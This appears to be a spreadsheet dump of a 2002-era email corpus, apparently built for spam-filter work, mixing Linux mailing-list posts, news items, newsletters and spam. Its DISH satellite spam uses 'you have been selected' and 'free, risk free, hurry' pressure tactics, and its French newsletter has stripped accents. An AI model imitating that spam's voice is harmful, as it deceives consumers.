 valign="top"&gt;         &lt;p align="center"&gt;&lt;font
 face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"
 size="-1"&gt;003-300299717499832716&lt;br&gt;           &lt;font
 color="#FF0000"&gt;&lt;b&gt;ATTENTION!&lt;/b&gt;&lt;/font&gt;&lt;br&gt;           &lt;/font&gt;&lt;font
 face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="-1"&gt;Valued      
      Customer# 772-00D87&lt;br&gt;           &lt;a
 href="http://r.vresp.com/?A/9c46df281a"&gt;"Claim your FREE Systems"&lt;/a&gt;&lt;br&gt; 
          or call&lt;strong&gt; 1-800-823-2466&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;         &lt;/TD&gt; 
     &lt;TD height="82"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=1
 HEIGHT=82&gt;&lt;/TD&gt;     &lt;/TR&gt;     &lt;TR height="76"&gt;      &lt;TD COLSPAN=2
 ROWSPAN=3 width="260"
 background="http://64.227.172.50/655410/images/Blue-Cert_waves02.gif"
 valign="top"&gt;                &lt;table border="0" cellpadding="0"
 cellspacing="8" width="100%" height="100%"&gt;           &lt;tr&gt;             
 &lt;td height="239" width="244" valign="top"&gt;               &lt;p&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" color="#000000"&gt;&lt;b&gt;&lt;font
 size="2"&gt;Congratulations!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;               &lt;p&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" color="#3b346e"
 size="1"&gt;&lt;span style="FONT-SIZE: 10pt; COLOR: #3b346e; FONT-FAMILY:
 Verdana"&gt;YOU                  HAVE BEEN SELECTED TO RECEIVE A &lt;b&gt;&lt;span
 style="FONT-WEIGHT: bold"&gt;FREE*&lt;/span&gt;&lt;/b&gt;                  4 Receiver
 DISH Satellite Entertainment System! Risk Free.&lt;a
 href="http://r.vresp.com/?A/e21ee3e89c"&gt;                  Click Here to
 Schedule your Free Installation &lt;/a&gt;($446.00 value).&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;    
           &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 color="#3b346e" size="1"&gt;&lt;span style="FONT-SIZE: 10pt; COLOR: #3b346e;
 FONT-FAMILY: Verdana"&gt;This                  is a special, limited-time
 offer with no hidden costs. &lt;em&gt;&lt;a
 href="http://r.vresp.com/?A/40ebe42446"&gt;Order                 
 today&lt;/a&gt;&lt;/em&gt; and receive 3 months of programming FREE. &lt;/span&gt;          
        &lt;font size="2" color="#FF0000"&gt;&lt;b&gt;&lt;font color="#333366"&gt;Hurry      
            Offer &lt;/font&gt;Expires FRIDAY July 26th &lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;   
            &lt;/td&gt;        &lt;/tr&gt;         &lt;/table&gt;      &lt;/TD&gt;             &lt;TD
 height="76" width="177"&gt;&lt;a href="http://r.vresp.com/?A/19fbb0eb2b"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/Blue-Cert_date_July26.gif"
 WIDTH=177 HEIGHT=76 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;      &lt;TD height="76"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=1
 HEIGHT=76&gt;&lt;/TD&gt;     &lt;/TR&gt;     &lt;TR height="146"&gt;             &lt;TD
 width="177" height="146"
 background="http://64.227.172.50/655410/images/Blue-Cert_waves03.gif"
 valign="top"&gt;         &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica,
 sans-serif" size="2" color="#000000"&gt;&lt;b&gt;Here's            what you'll
 get:&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;         &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica,
 sans-serif" size="2" color="#000000"&gt;-1            20 inch dish&lt;br&gt;       
    -4 satellite receivers (four rooms)&lt;br&gt;           -access card&lt;br&gt;     
      -4 remote controls&lt;br&gt;           -owner's manual&lt;br&gt;          
 -Professional Installation&lt;/font&gt;&lt;/p&gt;       &lt;/TD&gt;      &lt;TD
 height="146"&gt;&lt;IMG SRC="http://64.227.172.50/655410/images/spacer.gif"
 WIDTH=1 HEIGHT=146&gt;&lt;/TD&gt;     &lt;/TR&gt;     &lt;TR&gt;             &lt;TD width="177"&gt;&lt;a
 href="http://r.vresp.com/?A/968109a68e"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/Blue-Cert_signature.gif" WIDTH=177
 HEIGHT=33 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;      &lt;TD&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=1
 HEIGHT=33&gt;&lt;/TD&gt;     &lt;/TR&gt;     &lt;TR&gt;             &lt;TD COLSPAN=3 ROWSPAN=2
 width="437"&gt;&lt;a href="http://r.vresp.com/?A/8c35c0eb64"&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/Blue-Cert_barcode.gif" WIDTH=437
 HEIGHT=112 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;      &lt;TD&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=1 HEIGHT=9&gt;&lt;/TD&gt;
     &lt;/TR&gt;     &lt;TR&gt;      &lt;TD&gt;&lt;IMG
 SRC="http://64.227.172.50/655410/images/spacer.gif" WIDTH=1
 HEIGHT=103&gt;&lt;/TD&gt;     &lt;/TR&gt;    &lt;/TABLE&gt;   &lt;/div&gt;  &lt;/BODY&gt; &lt;/HTML&gt;
 &lt;br&gt;
                      &lt;hr color=e0e0e0&gt;
                      &lt;table border=0 cellpadding=5 cellspacing=0
 width=100%&gt;
                      &lt;tr&gt;
                            &lt;td&gt;&lt;font face="arial,verdana" size=1&gt;You have
 signed up with one of our network partners to receive email providing you
 with special offers that may appeal to you. If you do not wish to receive
 these offers in the future, reply to this email with "unsubscribe" in the
 subject or simply click on the following link: &lt;a
 href="http://unsubscribe.verticalresponse.com/u.html?ab749eca98/aa3b97bcc2"&gt;Unsubscribe&lt;/a&gt;&lt;/td&gt;
                      &lt;/tr&gt;
                      &lt;/table&gt;
 &lt;img src=http://i.verticalresponse.com/blank.gif?ab749eca98/aa3b97bcc2&gt;
 --__________MIMEboundary__________--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</si>
  <si>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[ILUG] Re: removing lilo
</t>
  </si>
  <si>
    <t xml:space="preserve">Ciaran Mac Lochlainn stated the following:
 &gt; 
 &gt; SoloCDM wrote:
 &gt; 
 &gt; &gt; Liam Bedford stated the following:
 &gt; 
 &gt; &lt;edit&gt;
 &gt; 
 &gt; &gt;&gt; fdisk /mbr will restore a dos MBR.. it'll leave the partitions
 &gt; &gt;&gt; alone.
 &gt; 
 &gt; &gt;&gt; linux fdisk and deleting all partitions will actually leave LILO in
 &gt; &gt;&gt; the MBR though.
 &gt; 
 &gt; &gt; While I am in Linux, the following message is the output when I
 &gt; &gt; execute fdisk /mbr, even though the drive is in read and write mode:
 &gt; 
 &gt; &gt; Unable to open /mbr
 &gt; 
 &gt; &gt; The mbr is on a separate drive -- not related to the Linux drive.
 &gt; 
 &gt; fdisk /mbr is a DOS command - if you are in Linux you will be running
 &gt; Linux fdisk, which doesn't have the /mbr option.  The Linux equivalent
 &gt; of "fdisk /mbr" is "lilo -u /dev/hda" (unless John Reilly was making
 &gt; that up yesterday - I haven't tried it!)
 Thanks!
 In the past I tried "lilo -u /dev/hda" and it wouldn't work -- an
 original copy of the MBR must be in /boot directory for it to work. 
 Which is exactly what I didn't have.  The installation of Linux
 Mandrake didn't afford me that luxury.
 Also, I'm glad you cleared up the fdisk issue.  I know better now --
 previously I was under the impression that fdisk had a hidden switch. 
 This is obviously not the case.
 -- 
 Note: When you reply to this message, please include the mailing
       list and/or newsgroup address and my email address in To:
 *********************************************************************
 Signed,
 SoloCDM
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Newsletter Coach'Invest - Septembre 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">NEWSLETTER COACHINVEST  SEPTEMBRE 2002
 CoachInvest, laccompagnateur des jeunes entreprises
 www.coachinvest.com ou 3615 COACHINVEST (0.34 Euros/min)
 DES NOUVELLES DE COACHINVEST.
 1- Lancement russi pour Coach'Invest Interactive qui dcroche ses premiers contrats.
 Coach'Invest Interactive accompagne les entreprises dans la cration, le dveloppement, l'optimisation et la gestion au quotidien de leur site Internet.
 Coach'Invest Interactive propose  ses clients de nombreux services afin de les aider  concevoir et  mettre en place leur stratgie Internet.
 Contact : Hugo BEAULIEU ; Tl : 01 56 77 01 20 / 06 81 57 85 47; E-mail : webmaster@coachinvest.com 
 Pour en savoir plus : http://www.coachinvest.com/entrepreneur/coach_interactive.html 
 2- Coach'Invest a investi dans deux nouvelles entreprises :
 Inqual :
 INQUAL est une socit cre en janvier 2001 par 3 ingnieurs issus de lENST et 1 cadre commercial expriment. Lquipe est aujourdhui compose de 12 personnes. Inqual est soutenu par lANVAR et a t rcompens pour ses contributions  linnovation par divers prix nationaux, dont le premier prix du concours Allgre.  Experte dans les architectures Internet, lquipe dInqual  matrise les conceptualisations de haut niveau (UML) et les serveurs dapplications, notamment ZOPE. INQUAL construit une offre au service des collectivits locales en proposant le premier  SIIC  (Systme dInformation Inter-Communal ). Ce systme apporte une gamme complte doutils permettant lutilisation professionnelle de fonctionnalits Internet, Intranet et Extranet, sans connaissances informatiques. La premire brique mtier de ce  SIIC  est un outil dautomatisation de publication pluri-mdia du Bulletin dInformations Municipales (BIM). Le logiciel LEBIM permet dditer et de modifier, 
  en ligne et en temps rel linformation pratique de la collectivit locale. Des outils intgrs permettent de gnrer automatiquement le site Internet dynamique de la commune. Le site ainsi dvelopp est mis  jour automatiquement et modifiable sans connaissances informatiques, par la commune elle-mme.                     Contact : Joseph OULHEN ; Tl : 02 98 02 03 61 ; E-mail : joseph.oulhen@inqual.com 
 Pour en savoir plus : http://www.coachinvest.com/startup/startup33.html
 Sir Assurances :
 Cre en 1994, la socit Sir Assurances est le premier courtier dassurances spcialis sur le march des entreprises nouvelles. Sir Assurances a dvelopp le portail www.newbizassur.com pour proposer aux entreprises nouvelles une large gamme de services et de produits dassurance rpondant  lensemble de leurs besoins. La socit commercialise sa plateforme technologique en marque blanche et/ou en co-branding auprs des principaux acteurs de lInternet en France et en Europe.
 Contact : Jean-Eudes LEBAUPIN ; Tl : 01 40 20 47 24 ; E-mail : jel@newbizassur.com   
 Pour en savoir plus :  http://www.coachinvest.com/startup/startup34.html
 3 - CoachInvest soutient activement deux vnements majeurs en faveur du dveloppement de lentrepreneuriat en France :
 Le lancement de lannuaire des investisseurs rgionaux
 Les journes Plug and Start (un vnement de la Technopole de lAube en Champagne).
  Annuaire des Investisseurs Rgionaux 2002 : 
 Pour rpondre aux besoins de financement des entreprises, lAnnuaire des Investisseurs Rgionaux recense les diffrents acteurs du financement et de laccompagnement des entreprises dans chaque rgion.
 Vous tes chef dentreprise ou dcid  exercer votre talent dentrepreneur, avec lAnnuaire des Investisseurs Rgionaux, vous identifierez rapidement les solutions de financement diversifies et adaptes aux besoins de votre entreprise. Cet annuaire est un outil de travail unique et indispensable pour lentrepreneur.
 Pour en savoir plus ou pour commander lAnnuaire des Investisseurs Rgionaux, contactez Virginie GOUPY par tlphone au 03 20 27 18 84 ou par mail : epr@vigiecom.net 
  Journes Plug and Start (8, 9 et 10 octobre 2002) : 
 La Technopole de lAube en Champagne (Troyes) innove avec le lancement les 8, 9 et 10 octobre prochains des Journes Plug and Start destines aux futurs crateurs dentreprises innovantes  caractre technologique ou scientifique. Avant mme son arrive  Troyes, chaque crateur bnficie dune premire analyse de son projet en toute confidentialit. Il a le droit  un tuteur (dirigeant dentreprise) pour laccompagner tout au long de son parcours. Un parrain est slectionn pour lui parmi les 150 experts constituants le cercle privilgi de la Technopole de lAube. Conseils personnaliss, alternance de travaux individuels et dateliers collectifs, expriences des intervenants, mise  disposition dun espace de travail quip, disponibilit de toute une quipe, mais aussi convivialit de la Technopole et plaisirs de la ville de Troyes  Plug and Start sest donn les moyens de russir et de faire russir les crateurs. A lissu des journes Plug and Start, les porteurs de pro
  jets pourront tre mis en contact avec le rseau de capital risque de la Technopole de lAube. Par ailleurs, ils pourront galement participer  un forum des capitaux o ils rencontreront de nombreux investisseurs.
 Pour en savoir plus et vous inscrire, contactez Michal NOBLOT au 03 25 83 10 10 ou par e-mail : m.noblot@technopole-aube.fr 
 DES NOUVELLES DE NOS PARTICIPATIONS.
 Caf &amp; Co : 
 Caf &amp; Co propose aux futurs gestionnaires indpendants de parcs de distributeurs automatiques de boissons l'ensemble des services tels que : solutions de financement, emplacements, formation et accompagnement, gestion, ... pour favoriser leur russite d'entrepreneur individuel. 
 Vous pouvez galement participer au dveloppement de Caf &amp; Co en bnficiant de l'installation gratuite d'un distributeur automatique de boissons chaudes dans vos locaux. 
 Contact : Nicolas BOUGON ; Tl : 06 60 41 35 14 ; E-mail : nbougon@noos.fr 
 Carlogo :
 La socit Carlogo propose aux annonceurs de nouvelles solutions d'affichage mobile  l'efficacit prouve (tude Ipsos) dont CARLOGO PUBLICITE qui permet aux automobilistes de gagner de l'argent (en louant un espace publicitaire sur leur voiture, les conducteurs sont rmunrs chaque mois).
 Aprs une campagne nationale pour le Crdit Foncier et des oprations pendant l't pour le Club Med, Galderma ou Aujourd'hui en France sur le Tour de France, de nouvelles campagnes auront lieu ds la rentre.
 Contact : Olivier MASCHINO ; Tl : 01 46 42 43 02 ; E-mail : olivier.maschino@carlogo.com 
 Pour en savoir plus : http://www.coachinvest.com/startup/startup20.html 
 France Actionnaire :
 Linformation sur les PME PMI cotes en bourse (entre 1 million et 1 milliard dEuros de capitalisation boursire) vous intresse ? Vous voulez connatre vos concurrents cots, leur valorisation, dcouvrir un secteur dactivit ?
 Sur www.france-actionnaire.com vous trouverez des analyses financires, des profils complets sur lactivit des socits et leurs concurrents, des ratios, des outils de comparaison.  Un outil rvolutionnaire dj utilis par un grand nombre dentreprises, danalystes financiers, de grants, et dinvestisseurs pour enfin avoir de linformation de qualit sur toutes les valeurs moyennes. 
 Nous vous proposons 2 offres et 2 modes daccs : 
 -	offre expert : paiement  la minute de consommation ou abonnement 
 -	offre premium : abonnement uniquement 
 Abonns  la newsletter de CoachInvest, profitez dune rduction de 30% sur les abonnements dune dure de 6 mois ou plus en donnant le mot de passe : CoachInvest.
 Contact : Sbastien FAIJEAN ; Tl : 01 48 01 87 27; E-mail :  contact@france-actionnaire.com   
 Pour en savoir plus : http://www.coachinvest.com/startup/startup08.html 
 Labelium :
 Labelium , 1er cabinet d'audit de sites Internet en France , vous propose de faire un devis gratuit d'intervention  pour votre site Internet. Le mtier de Labelium est de constater via un audit les forces et les faiblesses des sites et de recueillir via une grille dvaluation et selon 400 critres les lments damlioration possibles. Puis, nous catalysons lensemble des points damlioration identifis et rdigeons des recommandations stratgiques permettant au site daccrotre la qualit de  ses prestations.  A la suite de laudit et des recommandations , nous vous proposons des missions de soutien rcurrentes garantissant  votre site un niveau de performance optimal dans le temps. 
  Contact : Thierry HERRMANN ; Tl : 06 08 77 77 13; E-mail : info@labelium.com
 Pour en savoir plus : http://www.coachinvest.com/startup/startup28.html 
 Le Manoir du Grand Vignoble : 
 Le Manoir du Grand Vignoble, demeure du XVIIme sicle situ  40 kilomtres de Bergerac offre 10% de rduction sur les chambres (hors juillet-aot) aux lecteurs de la newsletter de CoachInvest. Les 44 chambres et suites sont spacieuses et souvrent sur les forts avoisinantes. Au restaurant ou sous les tonnelles de la terrasse, la cuisine propose est  limage de celle quvoque le mot Prigord, elle est gnreuse et gourmande, axe sur les produits du terroir sans ngliger pour cela linnovation.
 Contact : Denis PETE ; Tl : 05 53 24 23 18 ; E-mail : GRAND.VIGNOBLE@wanadoo.fr 
 Pour en savoir plus : http://www.coachinvest.com/startup/startup25.html   
 Netagis :
 NETAGIS vient de conclure un nouveau contrat en Gestion de Patrimoine avec les Mutuelles de Loire-Atlantique. La socit va grer les plans des diffrents btiments de la Mutuelle sur sa plateforme ActiGIS en version Patrimoine. Le contrat porte sur une dizaine de btiments reprsentant plusieurs milliers de mtre-carrs.
 Paralllement, NETAGIS annonce la sortie de ActiGIS Industrie en septembre destin  la gestion des plans de sites industriels pour apporter une relle assistance  la prise de dcision et  la matrise des risques industriels et environnementaux.
 Le programme de dveloppement R&amp;D de NETAGIS bnficie depuis le mois de juillet de l' appui de l'ANVAR.
 Contact : Patrick JULIEN ; Tl : 02 51 11 12 14  ; E-mail : patrick.julien@netagis.com  
 Pour en savoir plus : http://www.coachinvest.com/startup/startup21.html 
 QUE VOUS SOYEZ 
 -	ENTREPRENEUR (PORTEUR DE PROJET, DIRIGEANT DE START-UP, PATRON DE PME),
 -	PARTENAIRE POTENTIEL DE COACHINVEST (PRESTATAIRE LOCAL, ENTREPRISE NATIONALE, INSTITUTIONNEL, ASSOCIATION)
 NHESITEZ PAS A NOUS CONTACTER SI VOUS AVEZ ENVIE QUE LON TRAVAILLE ENSEMBLE.
 Si vous souhaitez en savoir plus sur CoachInvest, vous pouvez nous retrouver sur www.coachinvest.com 
 Retrouvez sur le minitel, code 3615 COACHINVEST (0.34 Euros/min), tous les documents juridiques dont vous avez besoin dans le cadre de votre entreprise. 
 Thomas Legrain
 PDG CoachInvest
 info@coachinvest.com
 ------------------------------------------------------------------------------
 Pour vous dsinscrire, rendez-vous  l'adresse suivante :
 http://www.coachinvest.com/Newsletter_commune/ml.php?type=desinscription&amp;addr=freebsd-stable@freebsd.org&amp;hash=c96285ccb37d419079d79ce22254cb66
 To Unsubscribe: send mail to majordomo@FreeBSD.org
 with "unsubscribe freebsd-stable" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Boy shot at school gate
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655711,215/
 Date: 2002-10-08T03:30:55+01:00
 *Gun violence in America: *A 13-year-old boy was shot in the chest and 
 critically wounded outside of his school in Maryland becoming the latest victim 
 of a sniper who has already killed six people.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Training in Ireland ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 This might appear as a very strange email. Maybe it is ;)
 I'm french, and I'm currently studying in a engineer school in France,
 called UTBM (http://www.utbm.fr). Next year, from February to July, I have
 to do a practice somewhere in the world (in France or elsewhere).
 I'm a Linux user and developer since a couple of years now (I coordinate the
 KOS project, http://kos.enix.org). That's why I'm looking for a practice in
 which I can use Linux and/or develop Linux/BSD Software. I also prefer
 working in a small company (&lt; 100 people). But since I've never been to
 Ireland (that's why I want to discover this country), and since I have no
 contact there, it is very difficult to find companies.
 So, I thought that the local Linux community maybe was able to help me by
 giving some list of companies that are known to work with Linux/BSD or any
 other free software.
 Thank you very much for your help
 Thomas
 Thomas Petazzoni
 thomas.petazzoni@non.hp.com
 KOS : http://kos.enix.org
 Perso : http://kos.enix.org/~thomas/ 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Dunno about the other tools, but SpamAssassin is a breeze to incorporate
 &gt; into a procmail environment.  Lots of people use it in many other ways.  For
 &gt; performance reasons, many people run a spamd process and then invoke a small
 &gt; C program called spamc which shoots the message over to spamd and passes the
 &gt; result back out.  I think spambayes in incremental mode is probably fast
 &gt; enough to not require such tricks (though I would consider changing the
 &gt; pickle to an anydbm file).
 &gt; 
 &gt; Basic procmail usage goes something like this:
 &gt; 
 &gt;     :0fw
 &gt;     | spamassassin -P
 &gt; 
 &gt;     :0
 &gt;     * ^X-Spam-Status: Yes
 &gt;     $SPAM
 &gt; 
 &gt; Which just says, "Run spamassassin -P reinjecting its output into the
 &gt; processing stream.  If the resulting mail has a header which begins
 &gt; "X-Spam-Status: Yes", toss it into the folder indicated by the variable
 &gt; $SPAM.
 &gt; 
 &gt; SpamAssassin also adds other headers as well, which give you more detail
 &gt; about how its tests fared.  I'd like to see spambayes operate in at least
 &gt; this way: do its thing then return a message to stdout with a modified set
 &gt; of headers which further processing downstream can key on.
 Do you feel capable of writing such a tool?  It doesn't look too hard.
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 01:40:30PM +0100, Brian O'Donoghue wrote:
 &gt; One thing that really bugs me is when people say things like.
 &gt; 
 &gt; "On the machies we have these days you don't have to worry about
 &gt;  writing optimised code" or "don't worry about writing
 &gt;  things inline, just use a function"
 Oops, I tend to feel like that most times! I tend to feel that if we
 have extremely good compilation tools, then those tools should be able
 to do the inlining and optimisation far better than I could. That's the
 theory anyway :) And there's always a tradeoff with inlining between
 speed and memory bloat (which may sometimes be no tradeoff if swap
 starts getting involved...)
 Gary.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranties Here                                                    undoc
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] eircoms adsl modems
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Not true on the choice part.
 After three weeks of me telling eircom that I did not in fact need nor want
 their ?1800 worth of router and firewall
 nor their onsite survey... for the uncapped service I actually managed to
 get a 4 port modem (after asking for a 1 port modem) instead of ye olde
 hardware router &amp; firewall and eircom onsite.
 I would have argued for the 1 port modem... (which I had asked for), but a
 Director wanted the DSL up ... and fast....
 Still it only took me three weeks to get (almost) what I
 wanted....................................
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 12 Reasons to Pre-Order my Novel
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85487893
 Date: Not supplied
 I've put up a page called "12 Reasons to Pre-Order Down and Out in the Magic 
 Kingdom," with blurbs by twelve people telling you why they think you should 
 buy it. Here're the blurbers:  
 -  Bruce Sterling 
 -  Lawrence Lessig 
 -  Kelly Link 
 -  Mark Frauenfelder 
 -  Karl Schroeder 
 -  Rudy Rucker 
 -  Howard Rheingold 
 -  Douglas Rushkoff 
 -  Tim O'Reilly 
 -  Bruce Schneier 
 -  Gardner Dozois 
 -  Mitch Kapor 
 And the blurbs are great, like this one: 
     Wow! Disney imagineering meets nanotechnology, the reputation economy, and 
     Ray Kurzweil's transhuman future. As much fun as Neal Stephenson's Snow 
     Crash, and as packed with mind bending ideas about social changes cascading 
     from the frontiers of science. 
     Tim O'Reilly
     Publisher and Founder, O'Reilly and Associates 
 (_NB: This used to be 13 reasons, but I just realized that I somehow ended up 
 with a phantom entry from Dan GIllmor, who, on closer examination, it appears I 
 failed to deliver a copy to, like a total idiot. My apologies, Dan_) Link[1] 
 Discuss[2]
 [1] http://www.craphound.com/blurbs.html
 [2] http://www.quicktopic.com/boing/H/ukUEeLcfy8zH
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Man's leg is found 7 miles from a hit and run accident
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8410270,1717/
 Date: 2002-09-30T22:21:11+01:00
 (DPO)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save an extra $50 on the iPaq 3835 PDA (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Shopper Newsletter: Alerts&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;center&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table border=0 cellpadding=0 cellspacing=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=5&gt;
 			&lt;img src="http://www.cnet.com/i/sh/nl/442_shopperALERT.gif" width="442" height="60" border="0" alt="CNET Shopper Newsletter Alerts"&gt;&lt;br&gt;
 				&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#CCCCCC"&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td width=9 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td  width=430&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;				
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#666666"&gt;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&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 &lt;!-- /advertisement label gif --&gt;
 &lt;!-- insert ad here --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /insert ad here --&gt;
 &lt;br&gt;
 &lt;!-- Most Popular --&gt;
 &lt;!-- /Most Popular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href="http://clickthru.online.com/Click?q=0e--eOTIiQzh-iW43J4r8dJx98lbKRR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=23-sFcGINM80tP2JITiAv2Y9ZZvQKFR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;  
 &lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM2Lk0NNk6nhJiSUxuD-D9R" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZA4ZVmYVkIKlsTn8N_JjiR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSs6_XkQCg_9-hwkp_WElR" &gt;ZDNet: PeopleSoft &lt;/a&gt; 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 &lt;!-- End Vertical Brick--&gt;
 					&lt;td width=9 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_c.gif" width=9 height=60&gt;&lt;br&gt;
 						&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=10&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td width=1 bgcolor="#666666" rowspan=2&gt;
 						&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=60&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr valign=top&gt;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width=410 bgcolor="#ffffff"&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#EEEEEE"&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=10&gt;&lt;/td&gt;
 &lt;!-- Date --&gt;
 								&lt;td&gt;
 									&lt;table cellpadding=0 cellspacing=0 border=0 width=400&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
